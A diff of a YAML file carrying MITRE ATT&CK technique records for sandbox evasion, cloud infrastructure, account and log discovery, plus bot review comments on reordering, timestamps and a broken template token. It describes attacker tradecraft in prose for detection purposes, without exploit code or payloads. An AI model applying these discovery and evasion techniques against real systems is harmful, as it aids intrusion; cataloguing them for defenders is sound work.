- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
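Review bot: this hunk mixes three separate changes that are hard to review together: the Prevailion DarkWatchman URL is swapped for a Wayback Machine snapshot (a sensible fix if the original link is dead, but the retrieval date stays at January 10, 2022), the `theGet-GlobalAddressList` typo in the T1087.003 description is fixed to `the Get-GlobalAddressList`, and the whole T1087.003 and T1497.003 objects are re-emitted in a new key order with `x_mitre_permissions_required` dropped. Because the old T1497.003 reference list is deleted here and only re-added in a later hunk, the diff reads as a deletion; a stable key order in the generator, or splitting the content fixes from the re-ordering, would make the review tractable.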
@@ -50075,6 +50723,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -50084,9 +50738,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50096,102 +50755,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
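Review bot: the whole T1580 block is re-emitted in a different key order, which buries the three changes that actually matter in this hunk: the "Mandiant M-Trends 2020" reference URL moves from content.fireeye.com/m-trends/rpt-m-trends-2020 to a mandiant.com PDF, `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0, and `spec_version: '2.1'` disappears (it is removed from every technique in this diff, so it should be called out in the commit message as a deliberate schema change rather than left for reviewers to infer). The description text is upstream ATT&CK wording carried verbatim, including "Adversaries have also may use" and the missing space in "Persistence.(Citation: Mandiant M-Trends 2020)An adversary", so it should not be hand-edited here; anything that renders it downstream will show those as-is.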
@@ -50245,7 +50939,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -50275,7 +50968,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
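Review bot: the replacement token `{{LinkById|T1059.008}` in the T1016 detection text has two opening braces and only one closing brace, so even a renderer that understands `{{LinkById|...}}` templates will not match it, and it will appear as literal braces next to the surrounding markdown links; the previous `(LinkById: T1059.008)` form was at least balanced. If this is verbatim upstream data it should be reported upstream, otherwise the generator is truncating the marker and should be fixed before this lands.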
@@ -50313,12 +51006,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50345,14 +51037,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
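Review bot: the platform list for T1087 drops Azure AD, Office 365 and Google Workspace in favour of Office Suite and Identity Provider, with the technique version bumped from 2.4 to 2.5; that follows the upstream ATT&CK platform consolidation, but anything in this repository that files or filters techniques by the old platform names (per-platform index files, platform filters in the generator) will silently stop matching this technique, so confirm those are regenerated or renamed in the same change.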
@@ -50381,7 +51072,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -50441,7 +51131,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
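Review bot: `modified` for T1482 moves backwards, from 2022-11-08 to 2022-06-16, and the same regression appears for T1217, T1049, T1619 and T1069.001 elsewhere in this diff while T1087, T1654 and T1201 move forward; a field that reflects the STIX object's own last-modified time should never regress. The old values share suspicious release-wide timestamps (several are exactly `14:00:00.188Z`), so the likely explanation is that the new source populates `modified` from the per-object value; please confirm that and note it in the commit message so the apparent regressions are not mistaken for stale data.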
@@ -50460,7 +51150,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -50529,12 +51218,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -50611,40 +51299,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50656,6 +51315,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -50666,8 +51329,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -50677,9 +51346,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
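Review bot: the "Deloitte Environment Awareness" reference for T1497 now ends in `/edit` (a Google Drive editor link) and its retrieval date moves from May 18, 2021 to September 13, 2024; the same change is repeated under T1497.002 later in the diff. An editor link is an unusual citation target compared with the previous bare file URL, and since these are upstream reference values they should not be hand-patched here, so it is worth confirming this is the intended upstream value rather than a generator artifact. The hunk also newly emits `revoked: false`, bumps `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0 and reorders the references; the reorder is pure churn that makes the real changes harder to spot.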
@@ -50712,7 +51400,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50730,12 +51418,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50743,11 +51430,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -50758,7 +51448,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50772,6 +51462,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
